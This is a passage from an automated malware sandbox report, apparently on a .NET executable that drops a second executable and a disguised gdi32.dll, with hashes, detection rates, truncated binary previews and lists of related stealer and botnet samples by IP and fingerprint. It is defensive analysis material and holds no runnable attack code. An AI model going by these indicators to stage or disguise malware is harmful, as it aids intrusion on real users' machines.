                                                                                                                                                                                                                                            SecuriteInfo.com.Win64.Trojan.Agent.2S9FJA.25494.32016.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 185.199.109.133

                                                                                                                                                                                                                                            ASNs

                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            FASTLYUShttps://renosuperstore.ca/shop/vanities/tesoro/tesoro-smally-collection/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 151.101.129.229
                                                                                                                                                                                                                                            https://t.ly/D5x5UGet hashmaliciousBraodoBrowse
                                                                                                                                                                                                                                            • 199.232.210.172
                                                                                                                                                                                                                                            209cf93b79fb8eacd8c4837dfc24f707d5f4a212.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                            • 151.101.2.137
                                                                                                                                                                                                                                            Selected_Items.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                            • 185.199.109.133
                                                                                                                                                                                                                                            https://sv-management.solarflevoland.nl/wixGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 185.199.108.133
                                                                                                                                                                                                                                            https://gerneva.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 151.101.131.1
                                                                                                                                                                                                                                            https://protect-us.mimecast.com/s/18vfCQWNWqS1V8BlCPhEHGoqRRGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 151.101.129.140
                                                                                                                                                                                                                                            https://www.bing.com/ck/a?!&&p=35f7ac11749086c457664a8010a84bc638d369283c719578d3701e6e769d80e3JmltdHM9MTczMDg1MTIwMA&ptn=3&ver=2&hsh=4&fclid=33680f6e-3a94-6c3f-27a6-1a423bb96ddc&psq=site%3Ahttps%3A%2F%2FChiefOfStaff.site&u=a1aHR0cHM6Ly93d3cuY2hpZWZvZnN0YWZmLnNpdGUvd2hhdC1hcmUtdGhlLWtleS1wcmluY2lwbGVzLW9mLW9wZXJhdGlvbnMtbWFuYWdlbWVudA#taehwan.lee@hdel.co.krGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                                                                                                                                                                                            • 151.101.2.137
                                                                                                                                                                                                                                            https://attack.mitre.org/techniques/T1204/001Get hashmaliciousLsass Dumper, Mimikatz, TrickbotBrowse
                                                                                                                                                                                                                                            • 185.199.108.153
                                                                                                                                                                                                                                            allpdfpro.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 151.101.194.137
                                                                                                                                                                                                                                            LEVEL3USi4w1K6ft2F.exeGet hashmaliciousMeduza Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                                                                                                                                                                                                            • 4.251.123.83
                                                                                                                                                                                                                                            xMYbN0Yd2a.exeGet hashmaliciousMeduza Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                                                                                                                                                                                                            • 4.251.123.83
                                                                                                                                                                                                                                            FaZM14kDMN.exeGet hashmaliciousMeduza Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                                                                                                                                                                                                            • 4.251.123.83
                                                                                                                                                                                                                                            j7movK82QT.exeGet hashmaliciousMeduza Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                                                                                                                                                                                                            • 4.251.123.83
                                                                                                                                                                                                                                            Z4uyrnCQ8L.exeGet hashmaliciousMeduza Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                                                                                                                                                                                                            • 4.251.123.83
                                                                                                                                                                                                                                            botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                            • 65.90.191.211
                                                                                                                                                                                                                                            sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                            • 4.98.147.155
                                                                                                                                                                                                                                            DEMASI-24-12B DOC. SCAN.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                                                                            • 4.150.155.223
                                                                                                                                                                                                                                            amen.arm6.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                            • 7.167.215.90
                                                                                                                                                                                                                                            amen.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                            • 11.22.83.104
                                                                                                                                                                                                                                            GITHUBUSSecuriteInfo.com.Win32.MalwareX-gen.20028.17631.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                                                                            List Furniture.batGet hashmaliciousPython Stealer, BraodoBrowse
                                                                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                                                                            BB.batGet hashmaliciousBraodoBrowse
                                                                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                                                                            meN9qeS2DE.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                                                                            Payment Confirmation (237 KB).msgGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                                                                            19532311200120230008100 Responsabilidad Civil Contractual extracontractual.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                                                                            3KOX6gQCoE.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                                                                            QzX4KXBXPq.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                                                                            SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                                                                            malware-DONT-RUN.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 140.82.121.4

                                                                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0ehttps://customization-connect-7617.my.salesforce.com/sfc/p/d3000000Byor/a/d300000000RR/ML8ajzoJU6aJIvGQZGZ6S9rRHpaD1XaytKzcNGEf56gGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                            • 185.199.111.133
                                                                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                            • 185.199.111.133
                                                                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                                                                            Booking_0731520.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                            • 185.199.111.133
                                                                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                                                                            https://shorten.is/meta_copyright_support_teamt5256Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 185.199.111.133
                                                                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                                                                            Fizetes_12112024.jpg.imgGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                            • 185.199.111.133
                                                                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                                                                            #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253,jpg.imgGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                            • 185.199.111.133
                                                                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                            • 185.199.111.133
                                                                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                                                                            Offer Document.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                            • 185.199.111.133
                                                                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                                                                            BL New Booking_ 021-34326093HL.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                            • 185.199.111.133
                                                                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                                                                            Malzeme i#U00e7in G#U00f6rsel Sipari#U015fler #PO160924R0 _323282.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                                                                                                                                            • 185.199.111.133
                                                                                                                                                                                                                                            • 140.82.121.4

                                                                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\gdi32.dlli4w1K6ft2F.exeGet hashmaliciousMeduza Stealer, PureLog Stealer, RedLine, zgRATBrowse

                                                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                                                              C:\Path1\To2\Save444\uh3ex1.exe

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\9LrEuTWP8s.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):271360
                                                                                                                                                                                                                                              Entropy (8bit):7.810825752992702
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:r0VLG6ytpg56d+Qa5BLhlEpZeVtveyqyC50G7hxWaZiHG6V:yLGNpEvnr+pZeVgyqyCPlsscG6V
                                                                                                                                                                                                                                              MD5:50CA49634420336958CE73629D9A2CF6
                                                                                                                                                                                                                                              SHA1:9653E0449A18DBDB8AF685F6B16B055CEA530139
                                                                                                                                                                                                                                              SHA-256:FC5DE864885DD6356C2FC91CFF867EFA50DD75856B26D41CB27194C8C0780AC2
                                                                                                                                                                                                                                              SHA-512:1839501BA5A1554C97EFA99493B565B8780C403750F9A46AD3FEE7F8A2073F0BEBC54AA79865A3CEA13A43C17D58665BD85E0BA2A8E9BA369EA34E0AEBDCE009
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....#g.............................6... ...@....@.. ....................................@..................................6..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B.................6......H............v......`.....................................................dI..5..d...j.Q..M~m.-R{X(..X%.X..j...v}..5...\....h.L..P...u.qUT....Q....2.!X..^.kNRN....*X...=3...v..f....W.a...r2..!..-.,,.....!....7.."t...[U6Or.u.T.\6..C9...;......b6.c.V6w.m..X..;....C.....<.._...L.../x.....b}..Y...e)..R!...Z.H.....*....Q.R..$n.>W."..,...i..O_...........cK5.1`\....B....qb$j.ZRtN.=..T.q...|y.f...w...-{.<._>1r..h........._oTF.1..C:z..po;....!...o.?I

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\9LrEuTWP8s.exe.log

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\9LrEuTWP8s.exe
                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                              Size (bytes):847
                                                                                                                                                                                                                                              Entropy (8bit):5.345615485833535
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                                                                                                                                                                                                              MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                                                                                                                                                                                                              SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                                                                                                                                                                                                              SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                                                                                                                                                                                                              SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2543
                                                                                                                                                                                                                                              Entropy (8bit):5.331950323785858
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HDfHKdHKLBHK7HKmTHQmHKtXoDHsLHqH5J:Pq5qHwCYqh3oPtI6eqzxTqdqlq7qqjqI
                                                                                                                                                                                                                                              MD5:D1C706335BBF6ECA4BECB0CACD9231EB
                                                                                                                                                                                                                                              SHA1:AC27DA2AC6FEC7C7F24C9796CB7BCECD5EF8F382
                                                                                                                                                                                                                                              SHA-256:45449CD3FC0C10386A37510D13C883FEF94883D11D757FDD0FFE4EDAF0DAAD75
                                                                                                                                                                                                                                              SHA-512:D5A4D33B362C4EF19CD0E43F2F518258EE45A1A32DED992B851276DF3BC8A4559E7D1872B155E10DAF1FF6B38C65AF472AF429B8362EBBB12976B3454C1FE68B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\uh3ex1.exe.log

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Path1\To2\Save444\uh3ex1.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                              Entropy (8bit):4.0050635535766075
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                                                                                                                                                                                              MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                                                                                                                                                                                              SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                                                                                                                                                                                              SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                                                                                                                                                                                              SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2232
                                                                                                                                                                                                                                              Entropy (8bit):5.379736180876081
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//MPUyus:tLHyIFKL3IZ2KRH9Ougss
                                                                                                                                                                                                                                              MD5:84D0B3B07B2FABFD5D0F3E724F41E2CE
                                                                                                                                                                                                                                              SHA1:8CB94823F1D28AA12678C877E2E1CF0D57CE5C69
                                                                                                                                                                                                                                              SHA-256:9F2745B3228D5DCFA4E9B4659F5A2A58A3446B7AECD20294BA34BF3A0312E0E3
                                                                                                                                                                                                                                              SHA-512:DAE272A0BB99FAB9A217FD4B448DE9847795636777DE9BA769A087DA5505BBCD5B5C29EE48C1241735A4F4AC9EF61E393B859C138D1F6244DF317A664D93375F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_itlscxdm.mn4.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pfc4gg11.hld.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_podo2qxv.dbg.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s2q4gvug.vuz.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\gdi32.dll

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Path1\To2\Save444\uh3ex1.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):851456
                                                                                                                                                                                                                                              Entropy (8bit):5.603254105469543
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:ERdEJtGfliyDB6NcP/BzYhy7EVe6JVM926xir0l6G8tGxBFLs8HVTN3gLkW/Ejs0:4OG
                                                                                                                                                                                                                                              MD5:CC2C8A64CDB44A65DB8AA6788CCB9F6A
                                                                                                                                                                                                                                              SHA1:B2ACE02DF584116849F26E4A92C2BD0F8CEF11C9
                                                                                                                                                                                                                                              SHA-256:DB4C8F95A46EC357887B98CCA78E3E6257F9EF6E7C965438328AB74A9A43FA8B
                                                                                                                                                                                                                                              SHA-512:BB3692A28EF19F456EE222E0D72347F44DBA48EEA606BA4DBDC794B72937203C3C57BE077E839F6A36159CBA6308F55A335D2008738B4E5FF530852573294CF6
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                                              • Filename: i4w1K6ft2F.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>3.._]]._]]._]].'^\._]].'X\._]].'Y\._]].'\\._]]..&]._]]._\]._]]..X\._]]..Y\._]]..^\._]]._]]._]]..]\._]].._\._]]Rich._]]........................PE..L.....#g...........!...&."...........u.......@...............................@............@.............................X...X...P............................ ......................................P...@............@..X............................text...3 .......".................. ..`.rdata..Bb...@...d...&..............@..@.data...lk.......b..................@....reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                              \Device\ConDrv

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\9LrEuTWP8s.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):205
                                                                                                                                                                                                                                              Entropy (8bit):1.1909845578742144
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:RRRQ5sQUA6au0QpRF0B6u53Bq:LW5sQUA6V0QjF03534
                                                                                                                                                                                                                                              MD5:9A515DFE476E4EEFC1F5D327ECAE118F
                                                                                                                                                                                                                                              SHA1:4E4B5441E849A219BF31397144B4EE631F9CC57C
                                                                                                                                                                                                                                              SHA-256:81FE43438BF823120D0279278A7B6C3D029E699FE05B4FEFFF85CCF271B08A72
                                                                                                                                                                                                                                              SHA-512:B9758B6043F79530632FF65677C8CD2A7901061C5041B6505F0DB2DA28EC3558A228D3802BF9CAFBFDC5ED63C4ECAF3460B9A5573F4BF48C149732E8316F92B6
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:?????????? ?????? ??????...????????? ????? ??????????????.....??????? ?????????? ???? ??????????.....????????? ????? ? ?????????? ??????????.....????????? ????.....???? ?????? ???????...????????? ????.....

                                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                              Entropy (8bit):5.0377599715857135
                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                                              File name:9LrEuTWP8s.exe
                                                                                                                                                                                                                                              File size:9'728 bytes
                                                                                                                                                                                                                                              MD5:ba7d3bda1009e3900c1eca3d56aa8b4f
                                                                                                                                                                                                                                              SHA1:3393a8485928315b58def904ccfb342ae1b30bdf
                                                                                                                                                                                                                                              SHA256:602a6a9693cdc77d1576ea6da66fd56e77c87a89ecef0d39b44563b93f8cc6b1
                                                                                                                                                                                                                                              SHA512:32372dc77849996cdd4e008d9ce8e3116417461c4b6f2755c99f9dd984420ad243c7e21470af342aeb06e32795e4f60dab1587ae1e9c40a59568b7115826b634
                                                                                                                                                                                                                                              SSDEEP:96:z3Oza/sBjQ83+lzRUMDjhb/UVpPZ40pW3WNtW1jYcFKNVcz1W4oKYMsLYUa:qz7BjH+ZDDdDUVpPdE8stYcFwVc03KY
                                                                                                                                                                                                                                              TLSH:0412E602B3E40232DD7686763D778391D735BB67494A4AAC708C5A0E3F351259333BE6
                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0............../... ...@....@.. ....................................`................................

